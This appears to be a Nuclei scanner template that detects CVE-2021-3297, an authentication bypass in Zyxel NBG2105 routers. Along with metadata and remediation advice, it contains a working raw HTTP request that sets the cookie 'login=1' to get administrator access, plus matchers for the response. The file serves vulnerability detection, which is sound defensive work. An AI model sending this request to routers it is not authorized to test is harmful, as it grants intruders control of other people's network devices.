id: CVE-2021-3297 info: name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass author: gy741 severity: high description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access. remediation: | Apply the latest firmware update provided by Zyxel to fix the authentication bypass vulnerability. reference: - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass - https://www.zyxel.com/us/en/support/security_advisories.shtml - https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105 - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-3297 cwe-id: CWE-287 epss-score: 0.18886 epss-percentile: 0.95659 cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel product: nbg2105_firmware tags: cve,cve2021,zyxel,auth-bypass,router http: - raw: - | GET /status.htm HTTP/1.1 Host: {{Hostname}} Cookie: language=en; login=1 matchers-condition: and matchers: - type: word words: - "Running Time" - "Firmware Version" - "Firmware Build Time" condition: and - type: status status: - 200 # digest: 4a0a00473045022100c3c962e171398f013983af1302d869c5b5343a711a9a270c7e4b0ed05265f022022005194d07b3fda5e05a061ddae8bbeef73ba78be9e841ed9475e79ae7ab37d069:922c64590222798bb761d5b6d8e72950